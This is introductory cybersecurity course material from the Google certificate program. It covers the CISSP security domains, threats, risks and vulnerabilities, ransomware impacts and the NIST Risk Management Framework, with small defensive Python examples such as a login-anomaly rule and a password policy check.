Responsive webpages automatically adjust their content to fit a variety of devices and screen sizes. This
is helpful because potential employers can review your content using any device and your media will
display just as you intend. When you’re ready, you can publish your website and receive a unique URL.
You can add this link to your resume so hiring managers can easily access your work.
Setup: To learn how to create a website in Google Sites, visit the Google Sites website.
Option 4: Git repository
Description: A Git repository is a folder within a project. In this instance, the project is your portfolio,
and you can use your repository to store the documents, labs, and screenshots you complete during each
course of the certificate program. There are several Git repository sites you can use, including:
● GitLab
● Bitbucket™
● GitHub
Each Git repository allows you to showcase your skills and knowledge in a customizable space. To create
an online project portfolio on any of the repositories listed, you need to use a version of Markdown.
Setup: To learn about how to create a GitHub account and use Markdown, follow the steps outlined in
the document Get started with GitHub.
Portfolio projects
As previously mentioned, you will have multiple opportunities throughout the certificate program to
develop items to include in your portfolio. These opportunities include:
● Drafting a professional statement
● Conducting a security audit
● Analyzing network structure and security
● Using Linux commands to manage file permissions
● Applying filters to SQL queries
● Identifying vulnerabilities for a small business
● Documenting incidents with an incident handler’s journal
● Importing and parsing a text file in a security-related scenario
● Creating or revising a resume
Note: Do not include any private, copyrighted, or proprietary documents in your portfolio. Also, if you
use one of the sites described in this reading, keep your site set to “private” until it is finalized.
Key takeaways
Now that you’re aware of some options for creating and hosting a professional portfolio, you can
consider these as you develop items for your portfolio throughout the certificate program. The more
proactive you are about creating a polished portfolio, the higher your chances of impressing a potential
employer and obtaining a new job opportunity in the cybersecurity profession.
Portfolio Activity Exemplar: Draft a professional statement
Here is a completed exemplar along with an explanation of how the exemplar fulfills the expectations for
the activity.
Link to exemplar:
● Professional statement exemplar
Glossary terms from module 4
Terms and definitions from Course 1, Module 4
Antivirus software: A software program used to prevent, detect, and eliminate malware and viruses
Database: An organized collection of information or data
Data point: A specific piece of information
Intrusion detection system (IDS): An application that monitors system activity and alerts on possible
intrusions
Linux: An open-source operating system
Log: A record of events that occur within an organization’s systems
Network protocol analyzer (packet sniffer): A tool designed to capture and analyze data traffic within a
network
Order of volatility: A sequence outlining the order of data that must be preserved from first to last
Programming: A process that can be used to create a specific set of instructions for a computer to
execute tasks
Protecting and preserving evidence: The process of properly working with fragile and volatile digital
evidence
Security information and event management (SIEM): An application that collects and analyzes log data to
monitor critical activities in an organization
SQL (Structured Query Language): A programming language used to create, interact with, and request
information from a database
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
(This is the course you just completed. Well done!)
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of network-level
vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Course 2 – Managing Security Risks
Earlier, we defined security and explored some common job responsibilities for entry-level analysts. We
also discussed core skills and knowledge that analysts need to develop. Then, we shared some key
events like the LoveLetter and Morris attacks that led to the development and ongoing evolution of the
security field. We also introduced you to frameworks, controls, and the CIA triad, which are all used to
reduce risk. In this course, we'll discuss the focus of Certified Information Systems Security
Professional's, or CISSP's, eight security domains. We'll also cover security frameworks and controls in
more detail, with a focus on NIST's Risk Management Framework. Additionally, we'll explore security
audits, including common elements of internal audits. Then, we'll introduce some basic security tools,
and you'll have a chance to explore how to use security tools to protect assets and data from threats,
risks, and vulnerabilities. Securing an organization and its assets from threats, risks, and vulnerabilities
is an important step in maintaining business operations. In my experience as a security analyst, I helped
respond to a severe breach that cost the organization nearly $250,000.
Course 2 overview
Hello, and welcome to Play It Safe: Manage Security Risks, the second course in the Google
Cybersecurity Certificate. You’re on an exciting journey!
By the end of this course, you will develop a greater understanding of the eight Certified
Information Systems Security Professional (CISSP) security domains, as well as specific
security frameworks and controls. You’ll also be introduced to how to use security tools
and audits to help protect assets and data. These are key concepts in the cybersecurity
field, and understanding them will help you keep organizations, and the people they serve,
safe from threats, risks, and vulnerabilities.
The Google Cybersecurity Certificate program has eight courses. Play It Safe: Manage
Security Risks is the second course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including
significant events that led to the development of the cybersecurity field and its
continued importance to organizational operations. Learn about entry-level
cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — (current course) Identify how cybersecurity
professionals use frameworks and controls to protect business operations, and
explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — Gain an understanding of
network-level vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills,
including communicating with the Linux operating system through the command
line and querying databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security
controls and developing a threat actor mindset to protect and defend an
organization’s assets from various threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response
lifecycle and practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming
language and write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification,
escalation, and ways to communicate with stakeholders. This course closes out the
program with tips on how to engage with the cybersecurity community and prepare
for your job search.
Course 2 content
Each course of this certificate program is broken into modules. You can complete courses at your
own pace, but the module breakdowns are designed to help you finish the entire Google
Cybersecurity Certificate in about six months.
What’s to come? Here’s a quick overview of the skills you’ll learn in each module of this course.
Module 1: Security domains
You will gain understanding of the CISSP’s eight security domains. Then, you'll learn about primary
threats, risks, and vulnerabilities to business operations. In addition, you'll explore the National
Institute of Standards and Technology’s (NIST) Risk Management Framework and the steps of risk
management.
Module 2: Security frameworks and controls
You will focus on security frameworks and controls, along with the core components of the
confidentiality, integrity, and availability (CIA) triad. You'll learn about Open Web Application
Security Project (OWASP) security principles and security audits.
Module 3: Introduction to cybersecurity tools
You will explore industry leading security information and event management (SIEM) tools that are
used by security professionals to protect business operations. You'll learn how entry-level security
analysts use SIEM dashboards as part of their everyday work.
Module 4: Use playbooks to respond to incidents
You'll learn about the purposes and common uses of playbooks. You'll also explore how
cybersecurity professionals use playbooks to respond to identified threats, risks, and
vulnerabilities.
The world of security, which we also refer to as cybersecurity throughout this program, is vast. So
making sure that you have the knowledge, skills, and tools to successfully navigate this world is why
we're here. In the following videos, you'll learn about the focus of CISSP's eight security domains. Then,
we'll discuss threats, risks, and vulnerabilities in more detail. We'll also introduce you to
the three layers of the web and share some examples to help you understand the different types of
attacks that we'll discuss throughout the program. Finally, we'll examine how to manage risks by using
the National Institute of Standards and Technology's Risk Management Framework, known as the NIST
RMF. Because these topics and related technical skills are considered core knowledge in the security
field, continuing to build your understanding of them will help you mitigate and manage the risks and
threats that organizations face on a daily basis. In the next video, we'll further discuss the focus of the
eight security domains introduced in the first course.
Welcome back! You might remember from course one that there are eight security domains, or
categories, identified by CISSP. Security teams use them to organize daily tasks and identify gaps in
security that could cause negative consequences for an organization, and to establish their security
posture. Security posture refers to an organization's ability to manage its defense of critical assets and
data and react to change. In this video, we'll discuss the focus of the first four domains: security and risk
management, asset security, security architecture and engineering, and communication and network
security.
The first domain is security and risk management. There are several areas of focus for this domain:
defining security goals and objectives, risk mitigation, compliance, business continuity, and legal
regulations. Let's discuss each area of focus in more detail. By defining security goals and objectives,
organizations can reduce risks to critical assets and data like PII, or personally identifiable information.
Risk mitigation means having the right procedures and rules in place to quickly reduce the impact of a
risk like a breach. Compliance is the primary method used to develop an organization's internal security
policies, regulatory requirements, and independent standards. Business continuity relates to an
organization's ability to maintain their everyday productivity by establishing risk disaster recovery
plans. And finally, while laws related to security and risk management are different worldwide, the
overall goals are similar. As a security professional, this means following rules and expectations for
ethical behavior to minimize negligence, abuse, or fraud.
The next domain is asset security. The asset security domain is focused on
securing digital and physical assets. It's also related to the storage, maintenance, retention, and
destruction of data. This means that assets such as PII or SPII should be securely handled and protected,
whether stored on a computer, transferred over a network like the internet, or
even physically collected. Organizations also need to have policies and procedures that ensure data is
properly stored, maintained, retained, and destroyed. Knowing what data you have and who has
access to it is necessary for having a strong security posture that mitigates risk to critical assets and
data. Previously, we provided a few examples that touched on the disposal of data. For example, an
organization might have you, as a security analyst, oversee the destruction of hard drives to make
sure that they're properly disposed of. This ensures that private data stored on those drives can't be
accessed by threat actors.
The third domain is security architecture and engineering. This domain is focused on optimizing data
security by ensuring effective tools, systems, and processes are in place to protect an organization's
assets and data. One of the core concepts of secure design architecture is shared responsibility. Shared
responsibility means that all individuals within an organization take an active role in lowering risk and
maintaining both physical and virtual security. By having policies that
encourage users to recognize and report security concerns, many issues can be handled quickly and
effectively.
The fourth domain is communication and network security, which is mainly focused on managing and
securing physical networks and wireless communications. Secure networks keep an organization's data
and communications safe whether on-site, or in the cloud, or when connecting to services remotely. For
example, employees working remotely in public spaces need to be protected from vulnerabilities that
can occur when they use insecure Bluetooth connections or public Wi-Fi hotspots. By having security team
members remove access to those types of communication channels at the organizational level,
employees may be discouraged from practicing insecure behavior that could be exploited by threat
actors. Now that we've reviewed the focus of our first four domains, let's discuss the last four domains.
In this video, we'll cover the last four domains: identity and access management, security assessment and
testing, security operations, and software development security.
The fifth domain is identity and access management, or IAM. And it's focused on access and
authorization to keep data secure by making sure users follow established policies to control and
manage assets. As an entry-level analyst, it's essential to keep an organization's systems and data as
secure as possible by ensuring user access is limited to what employees need. Basically, the goal of IAM
is to reduce the overall risk to systems and data. For example, if everyone at a company
is using the same administrator login, there is no way to track who has access to what data. In the event
of a breach, separating valid user activity from the threat actor would be impossible. There are four
main components to IAM. Identification is when a user verifies who they are by providing a user name,
an access card, or biometric data such as a fingerprint. Authentication is the verification
process to prove a person's identity, such as entering a password or PIN. Authorization takes place after
a user's identity has been confirmed and relates to their level of access, which depends on the role in the
organization. Accountability refers to monitoring and recording user actions, like login attempts, to
prove systems and data are used properly.
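The four IAM components above can be illustrated with a short sketch. Everything here is a hypothetical example for teaching purposes, not a real IAM product: the usernames, the fixed salt (real systems use per-user salts and a key derivation function), and the role table are all invented.

```python
# Illustrative sketch of the four IAM components: identification,
# authentication, authorization, and accountability. All names and
# data here are hypothetical; the fixed salt is a simplification.

import hashlib

USERS = {
    # username -> (salted password hash, role)  (identification data)
    "avi": (hashlib.sha256(b"salt" + b"hunter2").hexdigest(), "analyst"),
}

ROLE_PERMISSIONS = {  # authorization: access depends on the user's role
    "analyst": {"read_logs"},
    "admin": {"read_logs", "manage_users"},
}

AUDIT_LOG = []  # accountability: record user actions, like login attempts


def authenticate(username, password):
    """Authentication: prove the claimed identity with a secret."""
    record = USERS.get(username)  # identification: look up the claimed user
    ok = (record is not None and
          hashlib.sha256(b"salt" + password.encode()).hexdigest() == record[0])
    AUDIT_LOG.append((username, "login", "success" if ok else "failure"))
    return ok


def authorize(username, action):
    """Authorization: check that the user's role grants the action."""
    role = USERS[username][1]
    allowed = action in ROLE_PERMISSIONS[role]
    AUDIT_LOG.append((username, action, "allowed" if allowed else "denied"))
    return allowed
```

For example, `authenticate("avi", "hunter2")` succeeds, but `authorize("avi", "manage_users")` is denied because the analyst role was never granted that permission, and both decisions are recorded in the audit log.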
The sixth security domain is security assessment and testing. This domain focuses on conducting security
control testing, collecting and analyzing data, and conducting security audits to monitor for risks,
threats, and vulnerabilities. Security control testing can help an organization identify new and better
ways to mitigate threats, risks, and vulnerabilities. This involves examining organizational goals and
objectives, and evaluating if the controls being used actually achieve those goals. Collecting and
analyzing security data regularly also helps prevent threats and risks to the organization. Analysts might
use security control testing evaluations and security assessment reports to improve existing controls or
implement new controls. An example of implementing a new control could be requiring the use of multifactor authentication to better protect the
organization from potential threats and risks. Next, let's discuss security operations.
The security operations domain is focused on conducting investigations and implementing preventative
measures. Investigations begin once a security incident has been identified. This process requires a
heightened sense of urgency in order to minimize potential risks to the organization. If there is an active
attack, mitigating the attack and preventing it from escalating further is essential for ensuring that
private information is protected from threat actors. Once the threat has been neutralized, the collection
of digital and physical evidence to conduct a forensic investigation will begin. A digital forensic
investigation must take place to identify when, how, and why the breach occurred. This helps security
teams determine areas for improvement and preventative measures that can be taken to mitigate future
attacks.
The eighth and final security domain is software development security. This domain focuses on using
secure coding practices. As you may remember, secure coding practices are recommended guidelines
that are used to create secure applications and services. The software development lifecycle is an
efficient process used by teams to quickly build software products and features. In this process, security
is an additional step. By ensuring that each phase of the software development lifecycle undergoes
security reviews, security can be fully integrated into the software product. For example, performing a
secure design review during the design phase, secure code reviews during
the development and testing phases, and penetration testing during the deployment and
implementation phase ensures that security is embedded into the software product at every step. This
keeps software secure and sensitive data protected, and mitigates unnecessary
risk to an organization. Being familiar with these domains can help you better understand how they're
used to improve the overall security of an organization and the critical role security teams play.
Security domains cybersecurity analysts need to know
As an analyst, you can explore various areas of cybersecurity that interest you. One way to explore those
areas is by understanding different security domains and how they’re used to organize the work of
security professionals. In this reading you will learn more about CISSP’s eight security domains and how
they relate to the work you’ll do as a security analyst.
Domain one: Security and risk management
All organizations must develop their security posture. Security posture is an organization’s ability to
manage its defense of critical assets and data and react to change. Elements of the security and risk
management domain that impact an organization's security posture include:
● Security goals and objectives
● Risk mitigation processes
● Compliance
● Business continuity plans
● Legal regulations
● Professional and organizational ethics
Information security, or InfoSec, is also related to this domain and refers to a set of processes
established to secure information. An organization may use playbooks and implement training as a part
of their security and risk management program, based on their needs and perceived risk. There are
many InfoSec design processes, such as:
● Incident response
● Vulnerability management
● Application security
● Cloud security
● Infrastructure security
As an example, a security team may need to alter how personally identifiable information (PII) is treated
in order to adhere to the European Union's General Data Protection Regulation (GDPR).
Domain two: Asset security
Asset security involves managing the cybersecurity processes of organizational assets, including the
storage, maintenance, retention, and destruction of physical and virtual data. Because the loss or theft of
assets can expose an organization and increase the level of risk, keeping track of assets and the data they
hold is essential. Conducting a security impact analysis, establishing a recovery plan, and managing data
exposure will depend on the level of risk associated with each asset. Security analysts may need to store,
maintain, and retain data by creating backups to ensure they are able to restore the environment if a
security incident places the organization’s data at risk.
Domain three: Security architecture and engineering
This domain focuses on managing data security. Ensuring effective tools, systems, and processes are in
place helps protect an organization’s assets and data. Security architects and engineers create these
processes.
One important aspect of this domain is the concept of shared responsibility. Shared responsibility means
all individuals involved take an active role in lowering risk during the design of a security system.
Additional design principles related to this domain, which are discussed later in the program, include:
● Threat modeling
● Least privilege
● Defense in depth
● Fail securely
● Separation of duties
● Keep it simple
● Zero trust
● Trust but verify
An example of managing data is the use of a security information and event management (SIEM) tool to
monitor for flags related to unusual login or user activity that could indicate a threat actor is attempting
to access private data.
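The kind of rule a SIEM tool applies here can be sketched briefly. This is an illustrative simplification, not the configuration syntax of any real SIEM product; the usernames, timestamps, and thresholds are invented examples.

```python
# Minimal sketch of a SIEM-style detection rule: flag logins outside
# business hours or repeated failed attempts. Events are hypothetical
# (user, ISO timestamp, success) tuples, not a real log format.

from datetime import datetime


def flag_suspicious(events, start_hour=9, end_hour=17, max_failures=3):
    """Return the set of usernames whose login activity looks unusual."""
    flagged = set()
    failures = {}
    for user, timestamp, success in events:
        hour = datetime.fromisoformat(timestamp).hour
        if not (start_hour <= hour < end_hour):  # off-hours login attempt
            flagged.add(user)
        if not success:
            failures[user] = failures.get(user, 0) + 1
            if failures[user] >= max_failures:   # brute-force pattern
                flagged.add(user)
    return flagged


events = [
    ("amara", "2023-11-01T10:15:00", True),   # normal working-hours login
    ("amara", "2023-11-01T03:42:00", True),   # 3 AM login -> flagged
    ("ravi",  "2023-11-01T11:00:00", False),
    ("ravi",  "2023-11-01T11:01:00", False),
    ("ravi",  "2023-11-01T11:02:00", False),  # third failure -> flagged
]
```

Running `flag_suspicious(events)` flags both users: one for the off-hours login and one for repeated failures, the kind of signals an analyst would then investigate.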
Domain four: Communication and network security
This domain focuses on managing and securing physical networks and wireless communications. This
includes on-site, remote, and cloud communications.
Organizations with remote, hybrid, and on-site work environments must ensure data remains secure,
but managing external connections to make certain that remote workers are securely accessing an
organization’s networks is a challenge. Designing network security controls—such as restricted network
access—can help protect users and ensure an organization’s network remains secure when employees
travel or work outside of the main office.
Domain five: Identity and access management
The identity and access management (IAM) domain focuses on keeping data secure. It does this by
ensuring user identities are trusted and authenticated and that access to physical and logical assets is
authorized. This helps prevent unauthorized users, while allowing authorized users to perform their
tasks.
Essentially, IAM uses what is referred to as the principle of least privilege, which is the concept of
granting only the minimal access and authorization required to complete a task. As an example, a
cybersecurity analyst might be asked to ensure that customer service representatives can only view the
private data of a customer, such as their phone number, while working to resolve the customer's issue;
then remove access when the customer's issue is resolved.
Domain six: Security assessment and testing
The security assessment and testing domain focuses on identifying and mitigating risks, threats, and
vulnerabilities. Security assessments help organizations determine whether their internal systems are
secure or at risk. Organizations might employ penetration testers, often referred to as “pen testers,” to
find vulnerabilities that could be exploited by a threat actor.
This domain suggests that organizations conduct security control testing, as well as collect and analyze
data. Additionally, it emphasizes the importance of conducting security audits to monitor for and reduce
the probability of a data breach. To contribute to these types of tasks, cybersecurity professionals may
be tasked with auditing user permissions to validate that users have the correct levels of access to
internal systems.
Domain seven: Security operations
The security operations domain focuses on the investigation of a potential data breach and the
implementation of preventative measures after a security incident has occurred. This includes using
strategies, processes, and tools such as:
● Training and awareness
● Reporting and documentation
● Intrusion detection and prevention
● SIEM tools
● Log management
● Incident management
● Playbooks
● Post-breach forensics
● Reflecting on lessons learned
The cybersecurity professionals involved in this domain work as a team to manage, prevent, and
investigate threats, risks, and vulnerabilities. These individuals are trained to handle active attacks, such
as large amounts of data being accessed from an organization's internal network, outside of normal
working hours. Once a threat is identified, the team works diligently to keep private data and
information safe from threat actors.
Domain eight: Software development security
The software development security domain is focused on using secure programming practices and
guidelines to create secure applications. Having secure applications helps deliver secure and reliable
services, which helps protect organizations and their users.
Security must be incorporated into each element of the software development life cycle, from design and
development to testing and release. To achieve security, the software development process must have
security in mind at each step. Security cannot be an afterthought.
Performing application security tests can help ensure vulnerabilities are identified and mitigated
accordingly. Having a system in place to test the programming conventions, software executables, and
security measures embedded in the software is necessary. Having quality assurance and pen tester
professionals ensure the software has met security and performance standards is also an essential part
of the software development process. For example, an entry-level analyst working for a pharmaceutical
company might be asked to make sure encryption is properly configured for a new medical device that
will store private patient data.
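A task like "make sure encryption is properly configured" often starts with a checklist run against the device's settings. The setting names and thresholds below are hypothetical examples of such a policy, not the configuration interface of any real medical device.

```python
# Illustrative sketch of a pre-deployment encryption configuration
# check. The required settings and their values are invented examples
# of a policy, not a real device API.

REQUIRED = {
    "tls_version_min": 1.2,
    "key_length_bits_min": 256,
}


def check_encryption_config(config):
    """Return a list of findings; an empty list means the config passes."""
    findings = []
    if not config.get("encryption_at_rest"):
        findings.append("data at rest is not encrypted")
    if config.get("tls_version", 0) < REQUIRED["tls_version_min"]:
        findings.append("TLS version below 1.2")
    if config.get("key_length_bits", 0) < REQUIRED["key_length_bits_min"]:
        findings.append("encryption key shorter than 256 bits")
    return findings


device = {"encryption_at_rest": True, "tls_version": 1.0,
          "key_length_bits": 256}
```

Here `check_encryption_config(device)` reports the weak TLS version, giving the analyst a concrete finding to escalate before the device ships.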
Key takeaways
In this reading, you learned more about the focus areas of the eight CISSP security domains. In addition,
you learned about InfoSec and the principle of least privilege. Being familiar with these security domains
and related concepts will help you gain insight into the field of cybersecurity.
Threats, Risks, and Vulnerabilities
As an entry-level security analyst, one of your many roles will be to handle an organization's digital and
physical assets. As a reminder, an asset is an item perceived as having value to an organization. During
their lifespan, organizations acquire all types of assets, including physical office spaces, computers,
customers' PII, intellectual property, such as patents or copyrighted
data, and so much more. Unfortunately, organizations operate in an environment that presents multiple
security threats, risks, and vulnerabilities to their assets. Let's review what threats, risks,
and vulnerabilities are and discuss some common examples of each. A threat is any circumstance or
event that can negatively impact assets. One example of a threat is a social engineering attack. Social
engineering is a manipulation technique that exploits human error to gain private information, access,
or valuables. Malicious links in email messages that look like they're from legitimate companies or
people is one method of social engineering known as phishing. As a reminder, phishing is a technique
that is used to acquire sensitive data, such as usernames, passwords, or banking information. Risks are
different from threats. A risk is anything that can impact the confidentiality, integrity, or availability of an
asset. Think of a risk as the likelihood of a threat occurring. An example of a risk to an organization
might be the lack of backup protocols for making sure its stored information can be recovered in the
event of an accident or security incident. Organizations tend to rate risks at different levels: low,
medium, and high, depending on possible threats and the value of an asset. A low-risk asset is
information that would not harm the organization's reputation or ongoing operations and would not
cause financial damage if compromised. This includes public information such as website content, or
published research data. A medium-risk asset might include information that's not available to the public
and may cause some damage to the organization's finances, reputation, or ongoing operations. For
example, the early release of a company's quarterly earnings could impact the value of their stock. A
high-risk asset is any information protected by regulations or laws, which if compromised, would have a
severe negative impact on an organization's finances, ongoing operations, or reputation. This could
include leaked assets with SPII, PII, or intellectual property. Now, let's discuss vulnerabilities. A
vulnerability is a weakness that can be exploited by a threat. And it's worth noting that both a
vulnerability and threat must be present for there to be a risk. Examples of vulnerabilities include: an
outdated firewall, software, or application; weak passwords; or unprotected confidential data. People
can also be considered a vulnerability. People's actions can significantly affect an organization's internal
network. Whether it's a client, external vendor, or employee, maintaining security must be a united
effort. So entry-level analysts need to educate and empower people to be more security conscious. For
example, educating people on how to identify a phishing email is a great starting point. Using access
cards to grant employee access to physical spaces while restricting outside visitors is another good
security measure. Organizations must continually improve their efforts when it comes to identifying and
mitigating vulnerabilities to minimize threats and risks. Entry-level analysts can support this goal by
encouraging employees to report suspicious activity and
actively monitoring and documenting employees' access to critical assets. Now that you're familiar with
some of the threats, risks, and vulnerabilities analysts frequently encounter, coming up, we'll discuss
how they impact business operations.
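The low, medium, and high asset ratings described above can be captured in a small decision function. The classification rules below are a simplified illustration of the examples in this section, not a formal risk standard.

```python
# Hedged sketch of the low/medium/high asset risk ratings described
# above. The yes/no questions and their ordering are illustrative
# simplifications of the examples in the text.

def rate_asset(public, regulated, financial_impact):
    """Rate an asset's risk level from three yes/no questions."""
    if regulated:                      # PII, SPII, or protected IP
        return "high"
    if not public and financial_impact:
        return "medium"                # e.g. unreleased quarterly earnings
    return "low"                       # e.g. published website content


assert rate_asset(public=True,  regulated=False, financial_impact=False) == "low"
assert rate_asset(public=False, regulated=False, financial_impact=True) == "medium"
assert rate_asset(public=False, regulated=True,  financial_impact=True) == "high"
```

Note the ordering: the regulated-data check comes first, because legal protection overrides the other factors in the examples above, regardless of financial impact.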
Key Impacts of Threats, Risks, and Vulnerabilities
In this video, we'll discuss an expensive type of malware called ransomware. Then we'll cover three key
impacts of threats, risks, and vulnerabilities on organizational operations. Ransomware is a malicious
attack where threat actors encrypt an organization's data then demand payment to restore access. Once
ransomware is deployed by an attacker, it can freeze network systems, leave devices unusable, and
encrypt, or lock confidential data, making devices inaccessible. The threat actor then demands a ransom
before providing a decryption key to allow organizations to return to
their normal business operations. Think of a decryption key as a password provided to regain access to
your data. Note that when ransom negotiations occur or data is leaked by threat actors, these events can
occur through the dark web. While many people use search engines to navigate to their social media
accounts or to shop online, this is only a small part of what the web really is. The web is an interlinked
network of online content that's made up of three layers: the surface web, the deep web, and the dark
web. The surface web is the layer that most people use. It contains content that can be accessed using a
web browser. The deep web generally requires authorization to access it. An organization's intranet is
an example of the deep web, since it can only be accessed by employees or others who have been
granted access. Lastly, the dark web can only be accessed by using special software. The dark web
generally carries a negative connotation since it is the preferred web layer for criminals because of the
secrecy that it provides. Now, let's discuss three key impacts of threats, risks, and vulnerabilities. The
first impact we'll discuss is financial impact. When an organization's assets are compromised by an
attack, such as the use of malware, the financial consequences can be significant for a variety of reasons.
These can include interrupted
production and services, the cost to correct the issue, and fines if assets are compromised because of
non-compliance with laws and regulations. The second impact is identity theft. Organizations must
decide whether to store private customer, employee, and outside vendor data, and
for how long. Storing any type of sensitive data presents a risk to the organization. Sensitive data can
include personally identifiable information, or PII, which can be sold or leaked through the dark web.
That's because the dark web provides a sense of secrecy and threat actors may have the ability to sell
data there without facing legal consequences. The last impact we'll discuss is damage
to an organization's reputation. A solid customer base supports an organization's mission, vision, and
financial goals. An exploited vulnerability can lead customers to seek new business relationships with
competitors or create bad press that causes permanent damage to an organization's reputation. The loss
of customer data doesn't only affect an organization's reputation and financials, it may also result in
legal penalties and fines. Organizations are strongly encouraged to take proper security measures and
follow certain protocols to prevent the significant impact of threats, risks, and vulnerabilities. By using
all the tools in their toolkit, security teams are better prepared to handle an event such as a ransomware
attack.
NIST Risk Management Framework's seven steps for managing risk
As you might remember from earlier in the program, the National Institute of Standards and
Technology, NIST, provides many frameworks that are used by security professionals to manage
risks, threats, and vulnerabilities. In this video, we're going to focus on NIST's Risk Management
Framework or RMF. As an entry-level analyst, you may not engage in
all of these steps, but it's important to be familiar with this framework. Having a solid
foundational understanding of how to mitigate and manage risks can set you apart from
other candidates as you begin your job search in the field of security. There are seven steps in the
RMF: prepare, categorize, select, implement, assess,
authorize, and monitor. Let's start with:
Step one, prepare. Prepare refers to activities that are necessary to manage security and privacy
risks before a breach occurs. As an entry-level analyst, you'll likely use this step to monitor for risks
and identify controls that can be used to reduce those risks.
Step two is categorize, which is used to develop risk management
processes and tasks. Security professionals then use those processes and develop tasks by thinking
about how the confidentiality, integrity, and availability of systems and information
can be impacted by risk. As an entry-level analyst, you'll need to be able
to understand how to follow the processes established by your organization to reduce risks to
critical assets, such as private customer information.
Step three is select. Select means to choose, customize, and capture documentation of the controls
that protect an organization. An example of the select step would be keeping a playbook up-to-date
or helping to manage other documentation that allows you and your team to address issues more
efficiently.
Step four is to implement security and privacy plans for the organization. Having good plans in place
is essential for minimizing the impact of ongoing security risks. For example, if you notice a pattern
of employees constantly needing password resets, implementing a change to password
requirements may help solve this issue.
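A password-requirements change like the one suggested above usually means enforcing a policy check at reset time. The specific rules here (12-character minimum, mixed character classes) are illustrative choices, not a quoted standard.

```python
# Minimal sketch of a password policy check, as might be rolled out in
# the implement step above. The rule set is an illustrative example.

import string


def meets_policy(password, min_length=12):
    """True if the password satisfies length and character-class rules."""
    return (
        len(password) >= min_length
        and any(c in string.ascii_lowercase for c in password)
        and any(c in string.ascii_uppercase for c in password)
        and any(c in string.digits for c in password)
        and any(c in string.punctuation for c in password)
    )
```

For example, `meets_policy("Tr3e!house42")` passes, while `meets_policy("password")` fails on length and three missing character classes.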
Step five is assess. Assess means to determine if established controls are implemented correctly. An
organization always wants to operate as efficiently as possible. So it's essential to take the time to
analyze whether the implemented protocols, procedures, and controls that are in place are meeting
organizational needs. During this step, analysts identify potential weaknesses and determine
whether the organization's tools, procedures, controls, and protocols should be changed to better
manage potential risks.
Step six is authorize. Authorize means being accountable for the security and privacy risks that may
exist in an organization. As an analyst, the authorization step could involve generating reports,
developing plans of action, and establishing project milestones that are aligned to your
organization's security goals.
Step seven is monitor. Monitor means to be aware of how systems are operating. Assessing and
maintaining technical operations are tasks that analysts complete daily. Part of maintaining a low
level of risk for an organization is knowing how the current systems support the organization's
security goals. If the systems in place don't meet those goals, changes may be needed. Although it
may not be your job to establish these procedures, you will need to make sure they're working as
intended so that risks to the organization itself, and the people it serves, are minimized.
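The seven steps above can be captured as a simple ordered checklist that a team might track progress against. The step names and summaries come from this section; the tracking structure itself is an illustrative addition, not part of NIST's framework.

```python
# The seven NIST RMF steps, as an ordered checklist. Step names follow
# the video; the progress-tracking helper is an illustrative addition.

NIST_RMF_STEPS = [
    ("prepare",    "manage security and privacy risks before a breach"),
    ("categorize", "develop risk management processes and tasks"),
    ("select",     "choose, customize, and document protective controls"),
    ("implement",  "put security and privacy plans in place"),
    ("assess",     "determine if controls are implemented correctly"),
    ("authorize",  "be accountable for remaining security/privacy risks"),
    ("monitor",    "stay aware of how systems are operating"),
]


def next_step(completed):
    """Return the first RMF step not yet complete, or None if done."""
    for name, _ in NIST_RMF_STEPS:
        if name not in completed:
            return name
    return None
```

So `next_step({"prepare", "categorize"})` returns `"select"`, reflecting that the framework's steps build on one another in order.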
Manage common threats, risks, and vulnerabilities
Previously, you learned that security involves protecting organizations and people from threats, risks,
and vulnerabilities. Understanding the current threat landscape gives organizations the ability to create
policies and processes designed to help prevent and mitigate these types of security issues. In this
reading, you will further explore how to manage risk and some common threat actor tactics and
techniques, so you are better prepared to protect organizations and the people they serve when you
enter the cybersecurity field.
Risk management
A primary goal of organizations is to protect assets. An asset is an item perceived as having value to an
organization. Assets can be digital or physical. Examples of digital assets include the personal
information of employees, clients, or vendors, such as:
● Social Security Numbers (SSNs), or unique national identification numbers assigned to individuals
● Dates of birth
● Bank account numbers
● Mailing addresses
Examples of physical assets include:
● Payment kiosks
● Servers
● Desktop computers
● Office spaces
Some common strategies used to manage risks include:
● Acceptance: Accepting a risk to avoid disrupting business continuity
● Avoidance: Creating a plan to avoid the risk altogether
● Transference: Transferring risk to a third party to manage
● Mitigation: Lessening the impact of a known risk
Additionally, organizations implement risk management processes based on widely accepted
frameworks to help protect digital and physical assets from various threats, risks, and vulnerabilities.
Examples of frameworks commonly used in the cybersecurity industry include the National Institute of
Standards and Technology Risk Management Framework (NIST RMF) and Health Information Trust
Alliance (HITRUST).
Following are some common types of threats, risks, and vulnerabilities you’ll help organizations manage
as a security professional.
Today’s most common threats, risks, and vulnerabilities
Threats
A threat is any circumstance or event that can negatively impact assets. As an entry-level security
analyst, your job is to help defend the organization’s assets from inside and outside threats. Therefore,
understanding common types of threats is important to an analyst’s daily work. As a reminder, common
threats include:
● Insider threats: Staff members or vendors abuse their authorized access to obtain data that may harm an organization.
